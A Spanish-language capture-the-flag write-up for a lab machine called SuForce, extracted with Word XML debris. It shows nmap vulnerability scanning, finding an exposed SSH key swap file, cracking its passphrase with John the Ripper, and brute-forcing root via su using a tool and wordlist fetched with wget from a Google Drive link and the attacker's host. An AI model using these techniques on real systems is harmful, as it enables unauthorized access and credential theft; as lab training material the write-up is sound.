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SuForce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Realizamos escaneo de puertos abiertos, servicio con las versiones y posibles vulnerabilidades en la máquina víctima con nmap.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└─</w:t>
      </w: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$ nmap -p- -A -T4 --script vuln,default,safe -oN full_scan.txt 10.10.191.37 </w:t>
      </w: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Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-20 10:07 EDT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 profinet devices in the subnet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Pre-scan script results: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|_eap-info: please specify an interface with -e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|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/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| broadcast-dhcp-discover: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|   Response 1 of 1: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|     Interface: eth0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|     IP Offered: 192.168.41.129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|     Server Identifier: 192.168.41.254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|     Subnet Mask: 255.255.255.0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|     Router: 192.168.41.2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|     Domain Name Server: 192.168.41.2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|     Domain Name: localdomain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|     Broadcast Address: 192.168.41.255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|_    NetBIOS Name Server: 192.168.41.2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| broadcast-listener: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|   ether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|       ARP Request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|         sender ip     sender mac         target ip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|         192.168.41.2  00:50:56:ea:5f:6e  192.168.41.129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|   udp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|       DHCP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|         srv ip          cli ip          mask           gw            dns           vendor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|_        192.168.41.254  192.168.41.129  255.255.255.0  192.168.41.2  192.168.41.2  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| targets-asn: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|_  targets-asn.asn is a mandatory parameter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|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/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| broadcast-ping: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|   IP: 192.168.41.2  MAC: 00:50:56:ea:5f:6e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|_  Use --script-args=newtargets to add the results as targets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|_multicast-profinet-discovery: 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Nmap scan report for 10.10.191.37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Host is up (0.089s latency).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Not shown: 65533 closed tcp ports (reset)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Bug in http-security-headers: no string output.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PORT   STATE SERVICE VERSION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22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)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|_banner: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1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| vulners: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|   cpe:/a:openbsd:openssh:8.4p1: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|       CVE-2023-38408  9.8     https://vulners.com/cve/CVE-2023-38408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|       B8190CDB-3EB9-5631-9828-8064A1575B23    9.8     https://vulners.com/githubexploit/B8190CDB-3EB9-5631-9828-8064A1575B23      *EXPLOIT*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|       8FC9C5AB-3968-5F3C-825E-E8DB5379A623    9.8     https://vulners.com/githubexploit/8FC9C5AB-3968-5F3C-825E-E8DB5379A623      *EXPLOIT*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|       8AD01159-548E-546E-AA87-2DE89F3927EC    9.8     https://vulners.com/githubexploit/8AD01159-548E-546E-AA87-2DE89F3927EC      *EXPLOIT*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|       5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A    9.8     https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A      *EXPLOIT*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|       2227729D-6700-5C8F-8930-1EEAFD4B9FF0    9.8     https://vulners.com/githubexploit/2227729D-6700-5C8F-8930-1EEAFD4B9FF0      *EXPLOIT*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|       0221525F-07F5-5790-912D-F4B9E2D1B587    9.8     https://vulners.com/githubexploit/0221525F-07F5-5790-912D-F4B9E2D1B587      *EXPLOIT*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|       SSV:92579       7.5     https://vulners.com/seebug/SSV:92579    *EXPLOIT*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|       PACKETSTORM:173661      7.5     https://vulners.com/packetstorm/PACKETSTORM:173661      *EXPLOIT*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|       F0979183-AE88-53B4-86CF-3AF0523F3807    7.5     https://vulners.com/githubexploit/F0979183-AE88-53B4-86CF-3AF0523F3807      *EXPLOIT*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|       1337DAY-ID-26576        7.5     https://vulners.com/zdt/1337DAY-ID-26576        *EXPLOIT*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|       CVE-2021-28041  7.1     https://vulners.com/cve/CVE-2021-28041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|       CVE-2021-41617  7.0     https://vulners.com/cve/CVE-2021-41617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|       PACKETSTORM:189283      6.8     https://vulners.com/packetstorm/PACKETSTORM:189283      *EXPLOIT*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|       F79E574D-30C8-5C52-A801-66FFA0610BAA    6.8     https://vulners.com/githubexploit/F79E574D-30C8-5C52-A801-66FFA0610BAA      *EXPLOIT*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|       CVE-2025-26465  6.8     https://vulners.com/cve/CVE-2025-26465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|       1337DAY-ID-39918        6.8     https://vulners.com/zdt/1337DAY-ID-39918        *EXPLOIT*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|       CVE-2023-51385  6.5     https://vulners.com/cve/CVE-2023-51385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|       CVE-2023-48795  5.9     https://vulners.com/cve/CVE-2023-48795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|       CVE-2020-14145  5.9     https://vulners.com/cve/CVE-2020-14145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|       54E1BB01-2C69-5AFD-A23D-9783C9D9FC4C    5.9     https://vulners.com/githubexploit/54E1BB01-2C69-5AFD-A23D-9783C9D9FC4C      *EXPLOIT*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|       CVE-2016-20012  5.3     https://vulners.com/cve/CVE-2016-20012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|       CVE-2025-32728  4.3     https://vulners.com/cve/CVE-2025-32728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|       CVE-2021-36368  3.7     https://vulners.com/cve/CVE-2021-36368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|_      PACKETSTORM:140261      0.0     https://vulners.com/packetstorm/PACKETSTORM:140261      *EXPLOIT*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| ssh2-enum-algos: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|   kex_algorithms: (9)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|   server_host_key_algorithms: (5)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|   encryption_algorithms: (6)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|   mac_algorithms: (10)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|_  compression_algorithms: (2)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| ssh-hostkey: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|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)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|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)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|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)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80/tcp open  http    Apache httpd 2.4.56 ((Debian))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|_http-fetch: Please enter the complete path of the directory to save data in.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|_http-date: Tue, 20 May 2025 14:19:47 GMT; 0s from local time.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| http-grep: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|   (1) http://10.10.191.37:80/apache2;repeatmerged=0":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|     (1) ip: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|_      + 10.10.191.37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|_http-server-header: Apache/2.4.56 (Debian)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|_http-dombased-xss: Couldn't find any DOM based XSS.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|_http-csrf: Couldn't find any CSRF vulnerabilities.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| http-comments-displayer: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| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.191.37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|    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|     Path: http://10.10.191.37:80/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|     Line number: 196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|     Comment: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|         &lt;!--      &lt;div class="table_of_contents floating_element"&gt;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|                 &lt;div class="section_header section_header_grey"&gt;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|                   TABLE OF CONTENTS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|                 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|                 &lt;div class="table_of_contents_item floating_element"&gt;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|                   &lt;a href="#about"&gt;About&lt;/a&gt;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|                 &lt;/div&gt;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|                 &lt;div class="table_of_contents_item floating_element"&gt;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|                   &lt;a href="#changes"&gt;Changes&lt;/a&gt;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|                 &lt;/div&gt;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|                 &lt;div class="table_of_contents_item floating_element"&gt;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|                   &lt;a href="#scope"&gt;Scope&lt;/a&gt;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|                 &lt;/div&gt;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|                 &lt;div class="table_of_contents_item floating_element"&gt;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|                   &lt;a href="#files"&gt;Config files&lt;/a&gt;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|                 &lt;/div&gt;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|               &lt;/div&gt;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|_        --&gt;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| http-headers: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|   Date: Tue, 20 May 2025 14:19:49 GMT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|   Server: Apache/2.4.56 (Debian)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|   Last-Modified: Mon, 22 May 2023 11:58:08 GMT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|   ETag: "29cd-5fc46fbf640b4"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|   Accept-Ranges: bytes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|   Content-Length: 10701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|   Vary: Accept-Encoding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|   Connection: close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|   Content-Type: text/html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|  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|_  (Request type: HEAD)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|_http-mobileversion-checker: No mobile version detected.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|_http-title: Apache2 Debian Default Page: It works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|_http-referer-checker: Couldn't find any cross-domain scripts.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|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.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| http-useragent-tester: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|   Status for browser useragent: 200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|   Allowed User Agents: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|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)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|     libwww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|     lwp-trivial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|     libcurl-agent/1.0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|     PHP/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|     Python-urllib/2.5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|     GT::WWW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|     Snoopy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|     MFC_Tear_Sample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|     HTTP::Lite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|     PHPCrawl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|     URI::Fetch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|     Zend_Http_Client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|     http client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|     PECL::HTTP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|     Wget/1.13.4 (linux-gnu)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|_    WWW-Mechanize/1.34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| vulners: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|   cpe:/a:apache:http_server:2.4.56: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|       CVE-2024-38476  9.8     https://vulners.com/cve/CVE-2024-38476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|       CVE-2024-38474  9.8     https://vulners.com/cve/CVE-2024-38474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|       A5425A79-9D81-513A-9CC5-549D6321897C    9.8     https://vulners.com/githubexploit/A5425A79-9D81-513A-9CC5-549D6321897C      *EXPLOIT*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|       CVE-2024-38475  9.1     https://vulners.com/cve/CVE-2024-38475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|       5418A85B-F4B7-5BBD-B106-0800AC961C7A    9.1     https://vulners.com/githubexploit/5418A85B-F4B7-5BBD-B106-0800AC961C7A      *EXPLOIT*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|       2EF14600-503F-53AF-BA24-683481265D30    9.1     https://vulners.com/githubexploit/2EF14600-503F-53AF-BA24-683481265D30      *EXPLOIT*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|       0486EBEE-F207-570A-9AD8-33269E72220A    9.1     https://vulners.com/githubexploit/0486EBEE-F207-570A-9AD8-33269E72220A      *EXPLOIT*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|       3F71F065-66D4-541F-A813-9F1A2F2B1D91    8.8     https://vulners.com/githubexploit/3F71F065-66D4-541F-A813-9F1A2F2B1D91      *EXPLOIT*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|       B0A9E5E8-7CCC-5984-9922-A89F11D6BF38    8.2     https://vulners.com/githubexploit/B0A9E5E8-7CCC-5984-9922-A89F11D6BF38      *EXPLOIT*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|       CVE-2024-38473  8.1     https://vulners.com/cve/CVE-2024-38473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|       249A954E-0189-5182-AE95-31C866A057E1    8.1     https://vulners.com/githubexploit/249A954E-0189-5182-AE95-31C866A057E1      *EXPLOIT*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|       23079A70-8B37-56D2-9D37-F638EBF7F8B5    8.1     https://vulners.com/githubexploit/23079A70-8B37-56D2-9D37-F638EBF7F8B5      *EXPLOIT*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|       DF041B2B-2DA7-5262-AABE-9EBD2D535041    7.8     https://vulners.com/githubexploit/DF041B2B-2DA7-5262-AABE-9EBD2D535041      *EXPLOIT*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|       F7F6E599-CEF4-5E03-8E10-FE18C4101E38    7.5     https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38      *EXPLOIT*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|       E73E445F-0A0D-5966-8A21-C74FE9C0D2BC    7.5     https://vulners.com/githubexploit/E73E445F-0A0D-5966-8A21-C74FE9C0D2BC      *EXPLOIT*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|       E606D7F4-5FA2-5907-B30E-367D6FFECD89    7.5     https://vulners.com/githubexploit/E606D7F4-5FA2-5907-B30E-367D6FFECD89      *EXPLOIT*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|       E5C174E5-D6E8-56E0-8403-D287DE52EB3F    7.5     https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F      *EXPLOIT*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|       DB6E1BBD-08B1-574D-A351-7D6BB9898A4A    7.5     https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A      *EXPLOIT*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|       CVE-2024-40898  7.5     https://vulners.com/cve/CVE-2024-40898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|       CVE-2024-39573  7.5     https://vulners.com/cve/CVE-2024-39573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|       CVE-2024-38477  7.5     https://vulners.com/cve/CVE-2024-38477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|       CVE-2024-38472  7.5     https://vulners.com/cve/CVE-2024-38472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|       CVE-2024-27316  7.5     https://vulners.com/cve/CVE-2024-27316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|       CVE-2023-43622  7.5     https://vulners.com/cve/CVE-2023-43622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|       CVE-2023-31122  7.5     https://vulners.com/cve/CVE-2023-31122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|       CNVD-2024-20839 7.5     https://vulners.com/cnvd/CNVD-2024-20839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|       CNVD-2023-93320 7.5     https://vulners.com/cnvd/CNVD-2023-93320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|       CDC791CD-A414-5ABE-A897-7CFA3C2D3D29    7.5     https://vulners.com/githubexploit/CDC791CD-A414-5ABE-A897-7CFA3C2D3D29      *EXPLOIT*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|       C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B    7.5     https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B      *EXPLOIT*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|       BD3652A9-D066-57BA-9943-4E34970463B9    7.5     https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9      *EXPLOIT*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|       B5E74010-A082-5ECE-AB37-623A5B33FE7D    7.5     https://vulners.com/githubexploit/B5E74010-A082-5ECE-AB37-623A5B33FE7D      *EXPLOIT*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|       B0B1EF25-DE18-534A-AE5B-E6E87669C1D2    7.5     https://vulners.com/githubexploit/B0B1EF25-DE18-534A-AE5B-E6E87669C1D2      *EXPLOIT*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|       B0208442-6E17-5772-B12D-B5BE30FA5540    7.5     https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540      *EXPLOIT*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|       A820A056-9F91-5059-B0BC-8D92C7A31A52    7.5     https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52      *EXPLOIT*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|       A66531EB-3C47-5C56-B8A6-E04B54E9D656    7.5     https://vulners.com/githubexploit/A66531EB-3C47-5C56-B8A6-E04B54E9D656      *EXPLOIT*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|       9814661A-35A4-5DB7-BB25-A1040F365C81    7.5     https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81      *EXPLOIT*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|       788E0E7C-6F5C-5DAD-9E3A-EE6D8A685F7D    7.5     https://vulners.com/githubexploit/788E0E7C-6F5C-5DAD-9E3A-EE6D8A685F7D      *EXPLOIT*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|       5A864BCC-B490-5532-83AB-2E4109BB3C31    7.5     https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31      *EXPLOIT*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|       4B14D194-BDE3-5D7F-A262-A701F90DE667    7.5     https://vulners.com/githubexploit/4B14D194-BDE3-5D7F-A262-A701F90DE667      *EXPLOIT*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|       45D138AD-BEC6-552A-91EA-8816914CA7F4    7.5     https://vulners.com/githubexploit/45D138AD-BEC6-552A-91EA-8816914CA7F4      *EXPLOIT*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|       40879618-C556-547C-8769-9E63E83D0B55    7.5     https://vulners.com/githubexploit/40879618-C556-547C-8769-9E63E83D0B55      *EXPLOIT*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|       1F6E0709-DA03-564E-925F-3177657C053E    7.5     https://vulners.com/githubexploit/1F6E0709-DA03-564E-925F-3177657C053E      *EXPLOIT*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|       17C6AD2A-8469-56C8-BBBE-1764D0DF1680    7.5     https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680      *EXPLOIT*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|       CVE-2023-38709  7.3     https://vulners.com/cve/CVE-2023-38709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|       CNVD-2024-36395 7.3     https://vulners.com/cnvd/CNVD-2024-36395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|       95499236-C9FE-56A6-9D7D-E943A24B633A    6.9     https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A      *EXPLOIT*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|       2C119FFA-ECE0-5E14-A4A4-354A2C38071A    6.9     https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A      *EXPLOIT*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|       CVE-2024-24795  6.3     https://vulners.com/cve/CVE-2024-24795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|       CVE-2024-39884  6.2     https://vulners.com/cve/CVE-2024-39884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|       CVE-2023-45802  5.9     https://vulners.com/cve/CVE-2023-45802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|_      CVE-2024-36387  5.4     https://vulners.com/cve/CVE-2024-36387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|_http-xssed: No previously reported XSS vuln.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Device type: general purpose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Running: Linux 4.X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OS CPE: cpe:/o:linux:linux_kernel:4.15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OS details: Linux 4.15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Network Distance: 2 hops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Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel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Host script results: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|_fcrdns: FAIL (No PTR record)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|_path-mtu: PMTU == 1500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| port-states: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|   tcp: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|     open: 22,80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|_    closed: 1-21,23-79,81-65535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| traceroute-geolocation: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|   HOP  RTT    ADDRESS       GEOLOCATION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|   1    58.06  10.8.0.1      - ,-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|_  2    58.29  10.10.191.37  - ,-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| dns-blacklist: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|   SPAM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|     all.spamrats.com - FAIL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|_    l2.apews.org - FAIL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| qscan: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| PORT  FAMILY  MEAN (us)  STDDEV   LOSS (%)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| 1     0       61726.50   3532.67  0.0%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| 22    1       57731.30   1200.79  0.0%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|_80    1       58676.60   1738.36  0.0%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|_ipidseq: All zeros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TRACEROUTE (using port 5900/tcp)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HOP RTT      ADDRESS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1   58.06 ms 10.8.0.1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2   58.29 ms 10.10.191.37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Post-scan script results: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| reverse-index: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|   22/tcp: 10.10.191.37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|_  80/tcp: 10.10.191.37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OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ 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Nmap done: 1 IP address (1 host up) scanned in 747.84 seconds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Averiguamos que existe un servicio http corriendo en la máquina por el puerto 80. Vamos a realizar el reconocimiento del servicio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 gobuster.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/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http://IP_MAQUINA:80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639628" cy="235663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235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gobuster dir -u http://10.10.230.142 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE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/.htpasswd.html       (Status: 403) [Size: 278]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF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/index.html           (Status: 200) [Size: 10701]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100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/index.html           (Status: 200) [Size: 10701]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101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/notes.txt            (Status: 200) [Size: 101]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102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/server-status        (Status: 403) [Size: 278]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Hemos encontrado un archivo notes.txt que podría ser interesante.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019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¿Qué información revela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notes.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobre la seguridad del sistema? Encontramos al posible usuario Diego y tiene un archivo con la clave del servicio SSH perdido en el sistema. Vamos a buscar archivos temporales o de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gobuster dir -u http://10.10.191.37 -w /usr/share/wordlists/dirb/common.txt -x php,txt,bak,save,swp -t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230178" cy="27949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178" cy="279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Encontramos un archivo id_rsa.swp cual podemos abrir en navegador</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109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http://&lt;MACHINE_IP&gt;/id_rsa.swp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Hemos conseguido la clave privada del usuario SSH y vamos a descifrar para poder acceder a la máquina por vía SSH.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60076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Creamos un archivo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┌──(kali㉿kali)-[~/Documents/SuForce]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└─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$ nano clave.key    </w:t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Utilizamos una herramienta ssh2john para convertir la clave en archivo legible por la herramienta JohnTheRipper que se utiliza para crackear hashes.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┌──(kali㉿kali)-[~/Documents/SuForce]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">└─</w:t>
      </w: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$ ssh2john clave.key &gt; clave.hash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┌──(kali㉿kali)-[~/Documents/SuForce]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">└─$</w:t>
      </w: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 john --wordlist=/usr/share/wordlists/rockyou.txt ~/Documents/SuForce/clave.hash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Using default input encoding: UTF-8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Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])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Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes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Cost 2 (iteration count) is 2 for all loaded hashes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Will run 4 OpenMP threads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Press 'q' or Ctrl-C to abort, almost any other key for status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sandiego         (clave.key)   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1g 0:00:00:00 DONE (2025-05-20 12:17) 50.00g/s 158400p/s 158400c/s 158400C/s billy1..heaven1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Use the "--show" option to display all of the cracked passwords reliably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Session completed.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574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Ya tenemos la contraseña para el usuario Diego, pero no podemos acceder vía SSH solo con usuario y contraseña, tenemos que aplicar su clave privada.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36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ssh -i clave.key diego@&lt;MAQUINE_IP&gt;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18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En directorio /home del usuario hemos encontrado el archivo user.txt con la primera Flag.</w:t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FLAG://U53R_D13G0.GCF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473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¿Para qué se utilizan normalmente los archivos con extensión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.gcf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Archivo usado por Steam de Valve para guardar datos de juegos.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Vamos a escalar privilegios para conseguir la Flag del usuario root.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Descargamos la herramienta SuForce para realizar la fuerza bruta en la maquina victima para reconocer la contraseña del root.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wget 'https://drive.usercontent.google.com/uc?id=1DQZXdvk6mgJt1H2up-AjhW-Rmu8Pfl-p&amp;export=download' -O suForce.zip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399730" cy="2857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Descargamos la librería</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rockyou.txt a la máquina víctima para hacer fuerza bruta con suForce. Activamos el servidor http desde el directorio /usr/share/wordlists/ en nuestra máquina.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┌──(kali㉿kali)-[/usr/share/wordlists]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python3 -m http.server 8888 </w:t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Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...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Desde la máquina víctima descargamos rockyou.txt con wget.</w:t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diego@suforce:~$ wget http://10.23.75.205:8888/rockyou.txt</w:t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Grabando a: «rockyou.txt»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Descargamos ejecutable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suForce.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a la maquina victima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Activamos  servidor http desde el directorio donde está el archivo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suForce.sh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Y con wget descargamos.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944553" cy="23367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336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En el caso que el wget no funcione ¿con que otro comando lo descargarías?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Hemos utilizado la herramienta de descarga segura scp.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762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31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Cambiamos permisos al archivo ejecutable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suForce.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para poder realizar la fuerza bruta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chmod +x </w:t>
      </w:r>
      <w:hyperlink r:id="rId24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suForce.sh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color w:val="1155cc"/>
        </w:rPr>
      </w:pP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./suForce.sh -u root -w rockyou.txt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24669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¿Cómo escalar privilegios a root? Porque con </w:t>
      </w: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color w:val="1155cc"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> no funciona. Con el comando </w:t>
      </w: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su -</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> se escala los privilegios y se solicita la contraseña del root.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diego@suforce:~$ su -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Contraseña: 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root@suforce:~#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4775618" cy="196246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618" cy="196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En el directorio /root del usuario root hemos encontrado el archivo root.txt con la FLAG del usuario root.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root@suforce:~# cat root.txt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color w:val="3c78d8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3c78d8"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG://G00D_W0RK_R00T.GCF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F6A9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1F6A9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F6A9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1F6A9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1F6A9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1F6A96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1F6A9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1F6A9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1F6A9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1F6A9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1F6A9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F6A9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1F6A9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1F6A9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1F6A9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1F6A9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1F6A9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1F6A9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1F6A96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F6A9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1F6A9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F6A9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1F6A9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1F6A9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1F6A9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1F6A9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1F6A9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F6A9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1F6A96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hyperlink" Target="http://suforce.sh" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://suforce.s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ip_maquina:80" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.191.37/id_rsa.swp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hyperlink" Target="http://suforce.sh" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://suforce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4D6f6hQ/htBlcVgcbOpyQ+bBbg==">CgMxLjA4AHIhMUFxbHFYN3JmUUhHV2RyaXFzZjhpU3UwdUZ6N3hwZlVY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2025-05-20T13:38:00Z</dcterms:created>
  <dc:creator>Mavi Burbujita</dc:creator>
</cp:coreProperties>
</file>